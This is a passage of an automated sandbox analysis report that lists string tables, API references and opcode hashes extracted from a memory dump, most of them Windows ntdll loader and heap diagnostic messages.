                                                                                  control_flow_graph 150 1a92c0a-1a92c0f 151 1a92c1f-1a92c26 LdrInitializeThunk 150->151 152 1a92c11-1a92c18 150->152
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2336234768.0000000001A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A20000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_1a20000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2336234768.0000000001A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A20000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_1a20000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                  • API String ID: 0-2160512332
                                                                                  Strings
                                                                                  • undeleted critical section in freed memory, xrefs: 01AC542B
                                                                                  • Address of the debug info found in the active list., xrefs: 01AC54AE, 01AC54FA
                                                                                  • double initialized or corrupted critical section, xrefs: 01AC5508
                                                                                  • Invalid debug info address of this critical section, xrefs: 01AC54B6
                                                                                  • Thread is in a state in which it cannot own a critical section, xrefs: 01AC5543
                                                                                  • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01AC54CE
                                                                                  • 8, xrefs: 01AC52E3
                                                                                  • Critical section address, xrefs: 01AC5425, 01AC54BC, 01AC5534
                                                                                  • Thread identifier, xrefs: 01AC553A
                                                                                  • Critical section debug info address, xrefs: 01AC541F, 01AC552E
                                                                                  • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01AC54E2
                                                                                  • Critical section address., xrefs: 01AC5502
                                                                                  • corrupted critical section, xrefs: 01AC54C2
                                                                                  • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01AC540A, 01AC5496, 01AC5519
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2336234768.0000000001A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A20000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_1a20000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                  • API String ID: 0-2368682639
                                                                                  Strings
                                                                                  • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01AC2624
                                                                                  • RtlpResolveAssemblyStorageMapEntry, xrefs: 01AC261F
                                                                                  • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01AC2498
                                                                                  • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01AC2506
                                                                                  • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01AC2412
                                                                                  • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 01AC24C0
                                                                                  • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 01AC22E4
                                                                                  • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01AC2409
                                                                                  • @, xrefs: 01AC259B
                                                                                  • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 01AC25EB
                                                                                  • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01AC2602
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2336234768.0000000001A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A20000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_1a20000_SW_5724.jbxd
                                                                                  Strings
                                                                                  • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                  Strings
                                                                                  • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                  Strings
                                                                                  • HandleTraces, xrefs: 01AD8C8F
                                                                                  • VerifierFlags, xrefs: 01AD8C50
                                                                                  • AVRF: -*- final list of providers -*- , xrefs: 01AD8B8F
                                                                                  • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01AD8A67
                                                                                  • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01AD8A3D
                                                                                  • VerifierDlls, xrefs: 01AD8CBD
                                                                                  • VerifierDebug, xrefs: 01AD8CA5
                                                                                  Strings
                                                                                  • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                  Strings
                                                                                  • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                  Strings
                                                                                  • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01AA9A2A
                                                                                  • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 01AA99ED
                                                                                  • LdrpInitShimEngine, xrefs: 01AA99F4, 01AA9A07, 01AA9A30
                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 01AA9A11, 01AA9A3A
                                                                                  • apphelp.dll, xrefs: 01A46496
                                                                                  • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01AA9A01
                                                                                  Strings
                                                                                  • LdrpInitializeImportRedirection, xrefs: 01AC8177, 01AC81EB
                                                                                  • Loading import redirection DLL: '%wZ', xrefs: 01AC8170
                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 01A8C6C3
                                                                                  • minkernel\ntdll\ldrredirect.c, xrefs: 01AC8181, 01AC81F5
                                                                                  • Unable to build import redirection Table, Status = 0x%x, xrefs: 01AC81E5
                                                                                  • LdrpInitializeProcess, xrefs: 01A8C6C4
                                                                                  Strings
                                                                                  • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 01AC219F
                                                                                  • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 01AC21BF
                                                                                  • RtlGetAssemblyStorageRoot, xrefs: 01AC2160, 01AC219A, 01AC21BA
                                                                                  • SXS: %s() passed the empty activation context, xrefs: 01AC2165
                                                                                  • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01AC2180
                                                                                  • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01AC2178
                                                                                  APIs
                                                                                    • Part of subcall function 01A92DF0: LdrInitializeThunk.NTDLL ref: 01A92DFA
                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01A90BA3
                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01A90BB6
                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01A90D60
                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01A90D74
                                                                                  Strings
                                                                                  • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                  Strings
                                                                                  • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 01A8855E
                                                                                  • @, xrefs: 01A88591
                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 01A88421
                                                                                  • LdrpInitializeProcess, xrefs: 01A88422
                                                                                  Strings
                                                                                  • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 01AC21D9, 01AC22B1
                                                                                  • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 01AC22B6
                                                                                  • .Local, xrefs: 01A828D8
                                                                                  • SXS: %s() passed the empty activation context, xrefs: 01AC21DE
                                                                                  Strings
                                                                                  • RtlDeactivateActivationContext, xrefs: 01AC3425, 01AC3432, 01AC3451
                                                                                  • SXS: %s() called with invalid flags 0x%08lx, xrefs: 01AC342A
                                                                                  • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01AC3456
                                                                                  • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01AC3437
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                                  • API String ID: 0-1245972979
                                                                                  Strings
                                                                                  • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01AB0FE5
                                                                                  • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01AB1028
                                                                                  • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 01AB106B
                                                                                  • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 01AB10AE
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                  • API String ID: 0-1468400865
                                                                                  Strings
                                                                                  • LdrpDynamicShimModule, xrefs: 01ABA998
                                                                                  • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 01ABA992
                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 01ABA9A2
                                                                                  • apphelp.dll, xrefs: 01A72462
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                  • API String ID: 0-176724104
                                                                                  Strings
                                                                                  • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 01A6327D
                                                                                  • HEAP: , xrefs: 01A63264
                                                                                  • HEAP[%wZ]: , xrefs: 01A63255
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                  • API String ID: 0-617086771
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                  • API String ID: 0-4253913091
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: $@
                                                                                  • API String ID: 0-1077428164
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: FilterFullPath$UseFilter$\??\
                                                                                  • API String ID: 0-2779062949
                                                                                  Strings
                                                                                  • LdrpCheckModule, xrefs: 01ABA117
                                                                                  • Failed to allocated memory for shimmed module list, xrefs: 01ABA10F
                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 01ABA121
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                  • API String ID: 0-161242083
                                                                                  Strings
                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 01AC82E8
                                                                                  • Failed to reallocate the system dirs string !, xrefs: 01AC82D7
                                                                                  • LdrpInitializePerUserWindowsDirectory, xrefs: 01AC82DE
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                  • API String ID: 0-1783798831
                                                                                  Strings
                                                                                  • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 01B0C1C5
                                                                                  • @, xrefs: 01B0C1F1
                                                                                  • PreferredUILanguages, xrefs: 01B0C212
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                  • API String ID: 0-2968386058
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                  • API String ID: 0-1373925480
                                                                                  Strings
                                                                                  • LdrpCheckRedirection, xrefs: 01AD488F
                                                                                  • minkernel\ntdll\ldrredirect.c, xrefs: 01AD4899
                                                                                  • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01AD4888
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                  • API String ID: 0-3154609507
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                  • API String ID: 0-2558761708
                                                                                  Strings
                                                                                  • LdrpInitializationFailure, xrefs: 01AD20FA
                                                                                  • Process initialization failed with status 0x%08lx, xrefs: 01AD20F3
                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 01AD2104
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                  • API String ID: 0-2986994758
                                                                                  APIs
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: ___swprintf_l
                                                                                  • String ID: #%u
                                                                                  • API String ID: 48624451-232158463
                                                                                  Strings
                                                                                  • LdrResSearchResource Exit, xrefs: 01A5AA25
                                                                                  • LdrResSearchResource Enter, xrefs: 01A5AA13
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                                  • API String ID: 0-4066393604
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: `$`
                                                                                  • API String ID: 0-197956300
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID: Legacy$UEFI
                                                                                  • API String ID: 2994545307-634100481
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: @$MUI
                                                                                  • API String ID: 0-17815947
                                                                                  Strings
                                                                                  • kLsE, xrefs: 01A50540
                                                                                  • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 01A5063D
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                  • API String ID: 0-2547482624
                                                                                  Strings
                                                                                  • RtlpResUltimateFallbackInfo Exit, xrefs: 01A5A309
                                                                                  • RtlpResUltimateFallbackInfo Enter, xrefs: 01A5A2FB
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                  • API String ID: 0-2876891731
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID: Cleanup Group$Threadpool!
                                                                                  • API String ID: 2994545307-4008356553
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: MUI
                                                                                  • API String ID: 0-1339004836
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: GlobalTags
                                                                                  • API String ID: 0-1106856819
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: .mui
                                                                                  • API String ID: 0-1199573805
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: EXT-
                                                                                  • API String ID: 0-1948896318
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: BinaryHash
                                                                                  • API String ID: 0-2202222882
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: #
                                                                                  • API String ID: 0-1885708031
                                                                                  Strings
                                                                                  • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 01AD895E
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                                  • API String ID: 0-702105204
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2336234768.0000000001A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A20000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_1a20000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                                  • Instruction ID: 16ec5e8665d93442b97a48e8d2f8dc505a1b2491e9d62203ce2c3e3244fcd2c2
                                                                                  • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                                  • Instruction Fuzzy Hash: BEF16C71E0021A9BDB15CFA9C980BBEBBF9BF48710F088169E945AB351E774DD41CB60
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2336234768.0000000001A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A20000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_1a20000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: a78214035c6426d92b198baf51f57b21cae53fd5b59a6238e28474bc7abbc239
                                                                                  • Instruction ID: a4f5101afb259482ab31ea2f004525c0fa7938b0b1e2fd6e4c9624a487a6708b
                                                                                  • Opcode Fuzzy Hash: a78214035c6426d92b198baf51f57b21cae53fd5b59a6238e28474bc7abbc239
                                                                                  • Instruction Fuzzy Hash: 14D1EF71E0060A8BDF15CF69C885AFEBBF1AF88304F198169D955E7241E73DE905CB60
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2336234768.0000000001A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A20000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_1a20000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 257b64ba09cfb467903d9c97665c09fe58592d578df3f97978547f43119cfedf
                                                                                  • Instruction ID: 6b31c264fbfc898006a34ff5557a23364291bc718146fb2d7ece9d35ae01dc88
                                                                                  • Opcode Fuzzy Hash: 257b64ba09cfb467903d9c97665c09fe58592d578df3f97978547f43119cfedf
                                                                                  • Instruction Fuzzy Hash: 9AE18E71608342CFC755CF28C590A6ABBF0FF89314F458A6DE99987352EB31E905CB92
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2336234768.0000000001A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A20000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_1a20000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: f5d38da8e8f917803ed13c374cc40e164e8da6808f59f1b9ffd0250485069d98
                                                                                  • Instruction ID: 8340cf270355e1064a1f3142094b5a5ce113f9d02377f11cca61f566a9ca2cab
                                                                                  • Opcode Fuzzy Hash: f5d38da8e8f917803ed13c374cc40e164e8da6808f59f1b9ffd0250485069d98
                                                                                  • Instruction Fuzzy Hash: 4DD10771A006069FDB14DFA8D990ABAB7F5FF94304F05862DE916DB281E738D950CB60
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2336234768.0000000001A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A20000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_1a20000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                  • Instruction ID: 7541c4032057e07a9fa1fb3256cea6d8ae6a438b6b8f71d8c5a6029b7746a370
                                                                                  • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                  • Instruction Fuzzy Hash: D0B17274A00B05AFDB24DFA9C940AABBBB9FF84314F14445DEA1397794DA38E905CB50
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2336234768.0000000001A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A20000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_1a20000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                  • Instruction ID: dd15f36b5677abf64a57a5704627c59f0ae2423c6b53c7faacc30a36b48b1383
                                                                                  • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                  • Instruction Fuzzy Hash: ECB1F871600686AFDB25DB78C990BBEBBFEAF48200F184559E652D7282D730ED81CB50
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2336234768.0000000001A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A20000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_1a20000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 41aa33d5fe41b63b904932f07eb7e253dc2ea804455158e006790d4804bf02b6
                                                                                  • Instruction ID: 982fc334865102f9a6152cdf990a98c99e971f840afe5154513042edf0a8590d
                                                                                  • Opcode Fuzzy Hash: 41aa33d5fe41b63b904932f07eb7e253dc2ea804455158e006790d4804bf02b6
                                                                                  • Instruction Fuzzy Hash: 13C149741083818FD764CF29C494BABBBF5BF88308F44496DE98987291D778E949CF92
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2336234768.0000000001A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A20000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_1a20000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: a5423a83a7a7a6cd0b155804e702cbd1d8bffeebbae259a27188dd24939ec5be
                                                                                  • Instruction ID: 69801e0a0d927281dffb9a1a47c79957b8494cb3abbf8074a70817a738be7118
                                                                                  • Opcode Fuzzy Hash: a5423a83a7a7a6cd0b155804e702cbd1d8bffeebbae259a27188dd24939ec5be
                                                                                  • Instruction Fuzzy Hash: 55B18170A402668BDB24DF68C980BADB3F5EF84710F0485E9D50EE7295EB309D86CB61
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2336234768.0000000001A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A20000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_1a20000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 439bb3c9eb2af649844c2c8dd8535b472ac1a4e0cdddd082be752f5aa93441a5
                                                                                  • Instruction ID: 5502a7db39ea06d26b52b6212d95c68bdc61ce414562214c75d24250943b7686
                                                                                  • Opcode Fuzzy Hash: 439bb3c9eb2af649844c2c8dd8535b472ac1a4e0cdddd082be752f5aa93441a5
                                                                                  • Instruction Fuzzy Hash: 34A12631E00695AFEF21DB58CD84BEEBBB8BF05714F094165EA00AB292D7749E40CBD1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2336234768.0000000001A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A20000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_1a20000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 95bf3519c532948e30635ae65950260e48cff1a6ee03669b334d2f8d310e2649
                                                                                  • Instruction ID: 4a1493bf97671ff801d28bc6bb892704638e442f2bb6dc9954ed8bea143e67c5
                                                                                  • Opcode Fuzzy Hash: 95bf3519c532948e30635ae65950260e48cff1a6ee03669b334d2f8d310e2649
                                                                                  • Instruction Fuzzy Hash: 0FA1D170B00616DFDF25CF69CA90BAAB7F9FF54758F044029EA4597282DB34E891CB90
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2336234768.0000000001A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A20000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_1a20000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: d99ae061cb01ef0405274f0810e3ebe72fac556daa09206c60ee8c4020a769fa
                                                                                  • Instruction ID: fb2a525702f9b261493942bdea87276af7a279a7db7cb8a1dde2661198f2d7f6
                                                                                  • Opcode Fuzzy Hash: d99ae061cb01ef0405274f0810e3ebe72fac556daa09206c60ee8c4020a769fa
                                                                                  • Instruction Fuzzy Hash: C1A10472A10221DFCB25DF18CA80B6AB7E9FF48704F0545A9F549DBA11D374EC05CB91
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2336234768.0000000001A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A20000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_1a20000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                                                  • Instruction ID: a3b0c9b3f8f33afecc67a3baea572f00d81c6db9754c2c315e4d7662e8ec6b42
                                                                                  • Opcode Fuzzy Hash: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                                                  • Instruction Fuzzy Hash: 8DB13B71E0062ADFDF19CFA9C980AADB7B5FF48350F1481A9E918E7354D730A949CB90
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2336234768.0000000001A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A20000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_1a20000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: baf62a494416b65dd587cb451a2e1851c1be1ee64c395a42f9a308ad1190f567
                                                                                  • Instruction ID: 93d6264e8fdde692b7e1748e2340d4d58801cc8168ad1cd72eae1a1f948e09cb
                                                                                  • Opcode Fuzzy Hash: baf62a494416b65dd587cb451a2e1851c1be1ee64c395a42f9a308ad1190f567
                                                                                  • Instruction Fuzzy Hash: 5B91A371D00616AFDF15CFA9D884BBEBFB5AF48710F154169E61AEB341D734EA008BA0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2336234768.0000000001A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A20000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_1a20000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: a1af3626875d976562f5a183a648caff672c949ec3a46bb661c9f5c5f9793a6f
                                                                                  • Instruction ID: 9b4f2df2601ffc9f71325177fffdaca2c640f3eda660a10015394496cbc06f07
